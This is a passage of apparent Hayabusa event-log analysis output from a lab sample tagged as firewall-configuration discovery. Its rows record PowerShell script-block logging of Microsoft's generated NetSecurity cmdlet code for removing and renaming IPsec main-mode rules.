[string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('D",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"isplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] 
${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(Pa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } 
if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
